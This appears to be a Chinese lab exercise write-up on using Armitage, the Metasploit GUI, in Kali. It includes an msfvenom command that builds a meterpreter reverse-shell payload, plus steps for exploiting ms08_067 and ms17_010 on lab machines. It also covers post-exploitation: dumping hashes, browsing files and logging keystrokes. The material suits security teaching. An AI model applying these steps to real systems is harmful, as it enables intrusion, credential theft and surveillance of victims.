Kali008 Armitage(第2版)

目录

Armitage

8.1 启动Armitage

2、Armitage启动的三种方法:

8.2 使用Armitage生成被控端和主控端

1、Armitage的工作界面:

8.3 使用Armitage扫描网络

8.4 使用Armitage针对漏洞进行攻击

8.5 使用Armitage完成渗透之后的后续工作


Armitage

Armitage就是Metasploit的图形化操作界面。

其实命令行的操作方式之所以让很多人感到困难,主要是由于大多数人从小
就习惯了Windows操作系统以及这个系统中的图形化操作软件。因此如果
Metasploit有一个图形化的操作界面,那么学习起来将会是一个十分愉快的过
程。
Armitage就是一款使用Java语言为Metasploit编写的图形化操作界面,利用它
就可以轻松的使用Metasploit中的各种模块来实现自动化攻击。

安装

8.1 启动Armitage

1、Armitage启动前初始化:

2、Armitage启动的三种方法:

(1)菜单

(2)工具栏

(3)命令行  Armitage

       

8.2 使用Armitage生成被控端和主控端

1、Armitage的工作界面:

(1)区域1:

(2)区域2:

(3)区域3:命令行控制台

2、使用Armitage生成如下命令(见第6.5.2节,产生一个攻击载荷payload)。结果截图并作必要的说明。

(1)输出(output)选择exe,生成payload,类似执行如下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.149.135 lport=20000 -f dll -o /var/www/html/payload1.dll

(2)输出(output)选择multi/handler,则生成控制端,类似执行如下命令:

 

I:复制文件到网站主目录

II:启动apache2并检查

III:在目标靶机下载被控端文件

IV:运行文件

V:返回控制端查看是否获取会话

8.3 使用Armitage扫描网络

在Armitage使用nmap扫描工具,结果截图并作必要的说明。

使用图形化的nmap扫描本地网段,网段号 192.168.149.0/24              

(1)选择“Hosts/Nmap Scan/Quick Scan(OS detest) ”菜单

(相当于命令:nmap --min-hostgroup 96 -sV -n -T4 -O -F --version-light 192.168.152.0/24)

选择快速扫描方式

(2)输入扫描的网段

(3)扫描到的目标

8.4 使用Armitage针对漏洞进行攻击

1、利用XP系统ms08_067漏洞对XP系统进行渗透(命令行渗透见7.3节),结果截图并作必要的说明。

目标靶机:英文版XP,IP  192.168.149.128       

(1)通过输入关键字(ms08_067)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,是否建立会话?

注意:必须先停止apache,因为apache使用445端口,与该命令也使用445端口发生冲突!

2、利用win7系统ms17_010漏洞对win7系统进行渗透(命令行渗透见7.3节),结果截图并作必要的说明。

目标靶机:永恒之蓝靶机,IP    192.168.149.132              

(1)通过输入关键字(ms17_010)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,是否建立会话?

8.5 使用Armitage完成渗透之后的后续工作

1、利用meterpreter可完成的五类任务,结果截图并作必要的说明。

(1)Access:跟系统权限有关,如查看系统哈希值、盗取令牌、提升权限等。

(2)Interact:打开一个用于远程控制的命令,如系统命令行、Meterpreter命令等。

(3)Explore:渗透,如浏览系统文件、显示进程、监视键盘、截图、控制摄像头等。

(4)Pivoting:将主机设置成为跳板。

(5)ARP Scan:利用目标主机对目标网络进行扫描。

2、案例1:利用Meterpreter 1/Access/Dump Hashes菜单,盗取目标主机(英文版XP)的系统密码哈希值。结果截图并作必要的说明。

3、案例2:利用Meterpreter 1/Explore/Browse Files菜单,浏览目标主机上的文件。结果截图并作必要的说明。

4、案例3:利用Meterpreter 1/Explore/Log Keystrokes菜单,记录目标用户敲击键盘的动作。结果截图并作必要的说明。

I:启动键盘监听器

II:启动后弹出的窗口

III:目标靶机运行输入打开记事本

IV:在记事本中打点内容用于测试

V:返回控制端可以看到所打内容已被监听

  • 21
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wadalililu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值